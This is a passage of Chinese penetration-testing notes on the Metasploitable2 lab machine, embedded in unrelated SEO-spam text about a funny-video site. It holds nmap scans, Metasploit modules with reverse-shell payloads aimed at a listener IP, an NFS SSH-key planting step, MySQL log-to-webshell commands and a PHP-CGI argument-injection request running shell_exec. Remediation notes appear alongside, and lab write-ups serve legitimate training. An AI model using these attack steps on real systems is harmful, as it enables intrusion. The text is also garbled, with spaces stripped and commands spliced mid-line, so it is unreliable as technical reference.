大家好,697搞笑视频网站源码分享相信很多的网友都不是很明白,包括9761视频也是一样,不过没有关系,接下来就来为大家分享关于697搞笑视频网站源码分享和9761视频的一些知识点,大家可以关注收藏,免得下次来找不到哦,下面我们开始吧!
Metasploitable2笔记
Author:p1ng
tips:
setg命令可以将LHOST.LPORT等参数设置为全局变量,而不是局限于这一个模块内;\n
首先对靶机进行初步的探测扫描,可以检测到目标靶机开启的端口
StartingNmap7.91(https://nmap.org)at2023-03-1909:35CST\nNmapscanreportfor172.16.1.140\nHostisup(0.0035slatency).\nNotshown:65505closedports\nPORTSTATESERVICEVERSION\n21/tcpopenftpvsftpd2.3.4\n22/tcpopensshOpenSSH4.7p1Debian8ubuntu1(protocol2.0)\n23/tcpopentelnetLinuxtelnetd\n25/tcpopensmtpPostfixsmtpd\n53/tcpopendomainISCBIND9.4.2\n80/tcpopenhttpApachehttpd2.2.8((Ubuntu)DAV/2)\n111/tcpopenrpcbind2(RPC100003)\n2121/tcpopenftpProFTPD1.3.1\n3306/tcpopenmysqlMySQL5.0.51a-3ubuntu5\n3632/tcpopendistccddistccdv1((GNU)4.2.4(Ubuntu4.2.4-1ubuntu4))\n5432/tcpopenpostgresqlPostgreSQLDB8.3.0-8.3.7\n5900/tcpopenvncVNC(protocol3.3)\n6000/tcpopenX11(accessdenied)\n6667/tcpopenircUnrealIRCd\n6697/tcpopenircUnrealIRCd\n8009/tcpopenajp13ApacheJserv(Protocolv1.3)\n8180/tcpopenhttpApacheTomcat/CoyoteJSPengine1.1\n8787/tcpopendrbRubyDRbRMI(Ruby1.8;path/usr/lib/ruby/1.8/drb)\n33190/tcpopenstatus1(RPC100005)\n42383/tcpopennlockmgr1-4(RPCnmap-A-p-172.16.1.140\nStartingNmap7.91(https://nmap.org)at2023-03-1915:25CST\nNmapscanreportfor172.16.1.140\nHostisup(0.00076slatency).\nNotshown:65504closedports\nPORTSTATESERVICEVERSION\n21/tcpopenftpvsftpd2.3.4\n|_ftp-anon:AnonymousFTPloginallowed(FTPcode230)\n|ftp-syst:\n|STAT:\n|FTPserverstatus:\n|Connectedto172.16.1.123\n|Loggedinasftp\n|TYPE:ASCII\n|Nosessionbandwidthlimit\n|Sessiontimeoutinsecondsis300\n|Controlconnectionisplaintext\n|Dataconnectionswillbeplaintext\n|vsFTPd2.3.4-secure,fast,stable\n|_Endofstatus\n22/tcpopensshOpenSSH4.7p1Debian8ubuntu1(protocol2.0)\n|ssh-hostkey:\n|102460:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd(DSA)\n|_204856:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3(RSA)\n23/tcpopentelnetLinuxtelnetd\n25/tcpopensmtpPostfixsmtpd\n|_smtp-commands:metasploitable.localdomain,PIPELINING,SIZE10240000,VRFY,ETRN,STARTTLS,ENHANCEDSTATUSCODES,8BITMIME,DSN,\n|_ssl-date:2023-03-19T05:37:47+00:00;-1h50m03sfromscannertime.\n|sslv2:\n|SSLv2supported\n|ciphers:\n|SSL2_RC4_128_EXPORT40_WITH_MD5\n|SSL2_RC2_128_CBC_WITH_MD5\n|SSL2_RC4_128_WITH_MD5\n|SSL2_DES_192_EDE3_CBC_WITH_MD5\n|SSL2_RC2_128_CBC_EXPORT40_WITH_MD5\n|_SSL2_DES_64_CBC_WITH_MD5\n53/tcpopendomainISCBIND9.4.2\n|dns-nsid:\n|_bind.version:9.4.2\n80/tcpopenhttpApachehttpd2.2.8((Ubuntu)DAV/2)\n|_http-server-header:Apache/2.2.8(Ubuntu)DAV/2\n|_http-title:Metasploitable2-Linux\n111/tcpopenrpcbind2(RPC100003)\n2121/tcpopenftpProFTPD1.3.1\n3306/tcpopenmysqlMySQL5.0.51a-3ubuntu5\n|mysql-info:\n|Protocol:10\n|Version:5.0.51a-3ubuntu5\n|ThreadID:9\n|Capabilitiesflags:43564\n|SomeCapabilities:Support41Auth,Speaks41ProtocolNew,LongColumnFlag,SupportsTransactions,SwitchToSSLAfterHandshake,SupportsCompression,ConnectWithDatabase\n|Status:Autocommit\n|_Salt:bCg[rLf;2(s+yC39;:.t\n3632/tcpopendistccddistccdv1((GNU)4.2.4(Ubuntu4.2.4-1ubuntu4))\n5432/tcpopenpostgresqlPostgreSQLDB8.3.0-8.3.7\n|_ssl-date:2023-03-19T05:37:47+00:00;-1h50m03sfromscannertime.\n5900/tcpopenvncVNC(protocol3.3)\n|vnc-info:\n|Protocolversion:3.3\n|Securitytypes:\n|_VNCAuthentication(2)\n6000/tcpopenX11(accessdenied)\n6200/tcpfilteredlm-x\n6667/tcpopenircUnrealIRCd\n6697/tcpopenircUnrealIRCd\n8009/tcpopenajp13ApacheJserv(Protocolv1.3)\n|_ajp-methods:FailedtogetavalidresponsefortheOPTIONrequest\n8180/tcpopenhttpApacheTomcat/CoyoteJSPengine1.1\n|_http-favicon:ApacheTomcat\n|_http-server-header:Apache-Coyote/1.1\n|_http-title:ApacheTomcat/5.5\n8787/tcpopendrbRubyDRbRMI(Ruby1.8;path/usr/lib/ruby/1.8/drb)\n51481/tcpopennlockmgr1-4(RPC100024)\n53679/tcpopenmountd1-3(RPC39;`touch/tmp/test.txt`/tmp&查看目标机器中是否存在这些用户\nKali>smtp-user-enum-MVRFY-U<userlist>-t<targetIP>\n
111/tcprpcbind&&2049/tcpnfs
nfs服务的错误配置(Mis-ConfiguredNFSShare)
method1
Kali>showmount-e172.16.1.140创建一个存储ssh登入公钥私钥的文件夹\nKali>cd/root/.ssh/dev/null:表示将输出重定向到空设备,即不输出任何内容;known_hosts:是保存已知主机密钥的文件名;所以这个命令的作用就是清除known_hosts文件\nKali>ssh-keygen-trsa-b4096生成的文件命名为test\nKali>mount-tnfs172.16.1.140://mnt/将生成的test.pub复制到挂载在mnt的目标服务器的ssh私钥目录\nKali>cattest.pub>>authorized_keys用生成的ssh私钥实现无密码登入靶机的\n
参考文献:
https://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson4/index.html
修复方法:
可以通过NFS服务器上指定/etc/exports文件来限制共享的目录
139/tcp&&445/tcpsamba
CVE-2007-2447(SambaMS_RPCShell命令注入漏洞)
139/tcpopennetbios-ssnSambasmbd3.X-4.X(workgroup:WORKGROUP)\n445/tcpopennetbios-ssnSambasmbd3.X-4.X(workgroup:WORKGROUP)\n
method1
Kali>msfconsole查询SambaMS_RPCshell的模块\nmsf6>useexploit/multi/samba/usermap_script设置目标主机的IP\nmsf6>setLHOST<machine>远程连接mysql服务,并且以超级用户的身份登入\nMySQL>selectload_file(&39;);39;%secure%&查看secure_file_priv选项有没有值,secure_file_priv参数若没有值则可以进行操作,若不为空则需要通过配置文件对其进行修改\nMysql>select&34;intooutfile&34;;34;%general%&查看general_log的具体选项\nMysql>setglobalgeneral_log=&39;;39;/var/www/html/test.php&将其日志文件设置于Web目录下,并且将其后缀改为php让web服务器解析\nMysql>select&34;;metasploitable2中的MySQL并没有这个选项\n
修复方式
修改secure_file_priv参数的值,限制intooutfile/load_file函数可执行的目录,修改配置文件my.cnf
Kali>vim/etc/mysql/my.cnf39;/tmp&限制为tmp目录下\n
修改my.cnf文件中的general_log参数,将其修改为general_log=0
5432/tcppostgresql
CVE-2007-3280
method1
Kali>msfconsole\nmsf6>useexploit/linux/postgres/postgres_payload\nmsf6>setRHOSTS172.16.1.140\nmsf6>exploit\n
参考资料
https://www.cvedetails.com/cve/CVE-2007-3280/
8180/tcpHTTP
Tomcat
method1
Kali>msfconsole\nmsf6>useauxiliary/scanner/http/tomcat_mgr_login进行爆破,如果爆破不成功则调整PASS_FILE参数和USERPASS_FILE\nmsf6>useexploit/multi/http/tomcat_mgr_deploy利用msfvenom工具以java/jsp_shell_reverce_tcp为载荷172.16.1.123为监听IP,8848为监听端口生成一个War格式的木马\nmsf6>useexploit/multi/handler\nmsf6>setpayloadjava/jsp_shell_reverce_tcp\nmsf6>exploit\nKali>firefox\n
点击TomcatManager选项,然后输入tomcat的用户名和密码
成功进入后台后,将我们利用msfvenom生成的war包部署进去,即可在目录中看见新增的路径,我们点击路径,开启监听的handler模块即可收到反弹的shell
修复方法
更改Tomcat服务的默认用户名与密码禁用Tomcat管理页面或者限制其访问权限
3632/tcpDistccd
原理:Discccd是一个分布式编译器,用于加速编译过程,其客户端和服务器之间使用了没有身份验证的RCE协议进行通信
msf6>useexploit/unix/misc/distcc_exec\nmsf6>setpayloadpayload/cmd/unix/reverse\nmsf6>setRHOSTS172.16.1.140\nmsf6>setLHOST172.16.1.123\nmsf6>exploit\n
6667/tcp6697/tcpUnreallRcd
UnreallRcd后门漏洞
msf6>useexploit/unix/irc/unreal_ircd_3281_backdoor\nmsf6>setpayloadpayload/cmd/unix/reverse\nmsf6>setRHOSTS172.16.1.140\nmsf6>setLHOST172.16.1.123\nmsf6>exploit\n
1099/tcpJavarmi
利用JavaJMX服务的漏洞进行远程代码执行.JavaJMX是Java的一个管理和监控API,允许开发人员检测和管理Java应用程序
msf6>useexploit/multi/misc/java_jmx_server\nmsf6>setpayloadpayload/cmd/unix/reverse\nmsf6>setRHOSTS172.16.1.140\nmsf6>setLHOST172.16.1.123\nmsf6>exploit\n
修复方法:
修改JavaJMX的配置文件,禁止远程访问或指定访问控制策略,避免未授权访问
找到JavaJMX的配置文件jmxremote.access和jmxremote.password,通常位于\\<JAVA_HOME>/jre/lib/management目录下,如果该目录下没有这两个文件,则需要手动创建修改jmxremote.access文件,添加一下内容,表示只允许本地访问:
monitorRolereadonly\ncontrolRolereadwrite\\\ncreatejavax.management.monitor.*,javax.management.timer.*\\\nunregister\n
修改jmxremote.password文件,添加以下内容,表示只允许本地访问
monitorRolemonitorRolePassword\ncontrolRolecontrolRolePassword\n显示源代码\n
这里拓展一下PHP的参数
-c指定php.ini文件的位置\n-n不要加载php.ini文件\n-d指定配置项\n-b启动fastcgi进程\n-s显示文件源码\n-T执行指定次数该文件\n-h和-?显示帮助\n
我们可以通过-d指定auto_prepend_file来指导任意文件包含漏洞,同时需要将allow_url_include设置为on执行任意代码
Payload:?-dallow_url_include=on-dauto_prepend_file=php://input\n将=与:进行URL编码得,空格用+代替\nPayload:-?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input\n
我们构造数据包
POST/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//inputHTTP/1.1\nHost:172.16.1.140\nContent-Length:34\nPragma:no-cache\nCache-Control:no-cache\nUpgrade-Insecure-Requests:1\nUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/111.0.0.0Safari/537.36\nOrigin:http://172.16.1.140\nContent-Type:application/x-www-form-urlencoded\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer:http://172.16.1.140/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input\nAccept-Encoding:gzip,deflate\nAccept-Language:zh-CN,zh;q=0.9\nConnection:close\n\n<?phpechoshell_exec(&39;);?>\n
修复方法:
修改http.conf文件,找到\\<Directory/>增加如下内容
RewriteEngineon\nRewriteCond%{QUERY_STRING}^(%2d|-)[^=]+$[NC]\nRewriteRule^(.*)$1?[L]\n
参考资料
https://www.cnblogs.com/virgree/p/5411582.html
https://blog.csdn.net/weixin_45605352/article/details/115283390
fromhttps://sec-in.com/article/2160
关于697搞笑视频网站源码分享和9761视频的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站。